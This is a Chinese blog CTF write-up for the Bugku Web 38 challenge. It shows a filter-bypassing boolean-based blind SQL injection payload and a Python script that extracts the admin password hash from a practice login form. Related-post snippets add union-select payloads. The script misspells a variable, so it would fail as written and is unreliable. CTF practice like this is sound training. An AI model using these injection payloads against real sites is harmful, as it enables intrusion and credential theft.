Bugku Web 38

最新推荐文章于 2021-07-27 12:00:47 发布
最新推荐文章于 2021-07-27 12:00:47 发布
阅读量154 收藏
点赞数
分类专栏: Bugku_Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44190459/article/details/117003560
版权

Bugku Web 38

提 示: 基于布尔的SQL盲注

曾经我以为SQL注入很简单,没有多加练习,直到发现自己连ciscn初赛的easy_sql注入都不会做,我才追悔莫及

你看那个连SQL注入都不会的人好像条🐕啊

先瞅瞅

进入环境,是一个登陆页面,先试试万能密码(×),先试试adminbugku,adminbugkuctf,然后得到了flag,此题完

好好做

显示不合法的输入,显然被过滤了

然后再试试别的,发现被过滤的还有and,空格,逗号,等号,for
然后写脚本爆破password

import requests
import time
import string
url = 'http://114.67.246.176:19762/index.php'
source = string.digits + string.ascii_lowercase
a = ''
for i in range(1, 50):
    for j in sourse:
        payload = "admin'^((ascii(mid((select(password)from(admin))from(%s))))<>%s)^1#" % (i, ord(j))
        data = {'username': payload, 'password': '0'}
        res = requests.post(url, data=data)
        time.sleep(0.01)# 不加sleep网站会因访问过快拒绝访问
        if 'username does not exist!' in res.text:
            a += j
            print(a)
            break

然后得到结果,用MD5解密可以看到密码是bugkuctf,好家伙

之后假装刚知道的账号密码,去登陆就得到了flag

JJT_with_hair
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次简单的sql注入 bugku 成绩查询
jzw0831的博客
11-06 1099
一次简单的sql注入 bugku 成绩查询
bugkuweb38 基于布尔的SQL盲注
EC_Carrot的博客
12-25 731
题目 进去后是一个登陆界面,照常用admin登陆随便一个密码,发现说password error,在admin加上个'提示username does not exist!,再加上题目提示基于布尔的SQL盲注,猜测后端是判断username是否存在,这里可能就会有注入点。输入了and发现提示illegal character,说明有过滤。 先FUZZ测试一下发现and、+、=等许多东西都给过滤了,但是^、ascii、substr等用于盲注的函数都还在,主要的空格可以用()绕过,=可以用<>来代替
bugku 38~ 48 write up(web)
giun的博客
04-08 505
一、第38题(这是一个神奇的登陆框) 方法一 首先我们抓包, 经过一些尝试发现存在sql注入,并且sql语句是使用“来闭合的。 爆数据库 admin_name=1" union select database(),2#&admin_passwd=1&submit=GO+GO+GO 爆数据表 admin_name=1" union select (select table_nam...
Bugku WEB sql注入
qq_41696858的博客
07-27 540
明显的布尔盲注。md5值和之前的一样,bugkuctf 这题也是过waf题,具体过滤了哪些字符可以用burpsuite跑个字典看看。 然后就是#,substr这两个关键的函数没有进行过滤,那么可以根据这个构造payload,由于空格被过滤了,所以,考虑用()代替空格 把上一题的脚本改改,爆破出密码来,那就可以直接提交得到flag了 import requests #password一般由大小写字母和数字组成 allString = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJK
bugku——web8
吃肉唐僧的博客
09-01 498
打开题目,看到extract函数 第一时间想到覆盖变量漏洞,构造?ac=&f= 但是发现有empty判空,无法绕过 后来发现题目有提示txt,访问flag.txt 结合代码的file_get_contents就很好判断了 构造poc如下,拿到flag ...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
Bugku-WEB-web38
fallingskies
01-08 667
参考web36https://blog.csdn.net/qq_41209264/article/details/112257878 根据提示,布尔盲注。 但测试后发现and被过滤,只能使用异或^ 空格也被过滤 逗号被过滤,使用mid((password)from(1)for(1))代替mid((password),1,1) 等号被过滤,使用不等号<> for被过滤,使用ascii取字符串第一个字符转换为ascii码 构造如下 username=admin'^(ascii(mid
BugKuCTF(CTF-练习平台)——WEB-sql注入
Ifish的博客
02-25 3573
打开网址 注入题 修改id的值 发现只在id=1时显示,说明注入点应该是id=1 ‘闭合,发现不报错,尝试宽字节注入 报错 KEY{54f3320dc261f313ba712eb3f13a1f6d}...
CTF系列之Web——SQL注入
洛柒尘的博客
06-09 8248
前言 在刚学习sql注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的sql注入知识点。 学习web系列推荐先学习Mysql、H
BugkuCTF web sql注入2
H4ppyD0g的博客
02-08 555
页面post方式提交表单; 所有按钮都不好用; f12检查看到action到login.php,访问一下,username和password都需要填写; 输入用户名直接提交提示用户名和密码都需要填写; 后台扫描没有结果; 经过一些列输入测试,判断admin就是用户名,但是密码不知道; 初步判断为post提交sql注入,'单引号验证一下 admin' -- # 判断应该就是这道题目就是考察的sql注...
CTF学习之路---bugku WEB篇-SQL注入1(已挂)
踏坑的小白
01-03 720
SQL注入1(已挂) 因为题目挂了只能还原一下 进入题目 题目要求: 访问参数为:?id=x 查找表为key的数据表,id=1值hash字段值 代码 //过滤sql $array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','t...
C#读取WinCC实时和归档数据
06-21
如何在 C#应用程序中读取 WinCC 变量归档数据,资源来自西门子官网
解放鼠标右键 chrome edge 浏览器 插件
06-21
解放鼠标右键 chrome edge 浏览器 插件 开启开发者模式,拖入扩展管理即可使用
Python实战示例自动办公-20 Python文本数据可视化之“词云”图.zip
06-21
自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图
Pygments-0.11-py2.5.egg
最新发布
06-21
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
bugku sodirty
09-03
- *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值